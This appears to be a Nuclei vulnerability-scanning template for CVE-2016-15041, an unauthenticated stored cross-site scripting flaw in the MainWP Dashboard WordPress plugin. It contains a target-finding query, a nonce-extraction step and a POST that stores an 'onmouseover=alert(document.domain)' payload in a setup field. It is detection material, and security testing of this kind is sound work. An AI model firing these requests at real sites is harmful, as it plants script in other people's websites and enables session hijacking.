MainWP Dashboard – The Private WordPress Manager for Multiple Website Maintenance plugin for WordPress versions up to 3.1.2 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in 'mwp_setup_purchase_username' parameter, letting unauthenticated attackers inject and execute arbitrary scripts when users access affected pages.
PoC代码[已公开]
id: CVE-2016-15041
info:
name: MainWP Dashboard <= 3.1.2 - Stored Cross-Site Scripting
author: flame
severity: high
description: |
MainWP Dashboard – The Private WordPress Manager for Multiple Website Maintenance plugin for WordPress versions up to 3.1.2 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in 'mwp_setup_purchase_username' parameter, letting unauthenticated attackers inject and execute arbitrary scripts when users access affected pages.
impact: |
Unauthenticated attackers can inject scripts that execute in users' browsers, potentially leading to session hijacking, defacement, or redirection.
remediation: |
Update to the latest version of the plugin that addresses this vulnerability.
reference:
- https://klikki.fi/mainwp-admin-panel-unauthenticated-stored-xss/
metadata:
verified: true
max-request: 4
fofa-query: "/wp-content/plugins/mainwp/"
tags: cve,cve2016,mainwp,wordpress,xss,wp,wp-plugin,vkev
variables:
randstr: "{{rand_base(8)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/mainwp-vuln/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- compare_versions(version, '<= 3.1.2')
condition: and
internal: true
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
GET /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension&_wpnonce={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mwp_setup_purchase_username={{randstr}}"+onmouseover%3Dalert(document.domain)+x%3D"&mwp_setup_purchase_passwd=test&save_step=1
- |
GET /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '_wpnonce" value="([a-zA-Z0-9]+)"'
internal: true
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "MainWP"
- "Setup Wizard"
- "mwp_setup_purchase_username"
condition: and
- type: word
part: body_3
words:
- ' onmouseover=alert(document.domain) x'
- type: status
status:
- 200
# digest: 4a0a00473045022100be4a0aab8a0674178125439960de423fe5845f9adec80cfdf9bf84be930aa8de02202f2ac43ce1b67d7fef376c9c5c8dc34b468ca363bf61a204d88655e6613c92f0:922c64590222798bb761d5b6d8e72950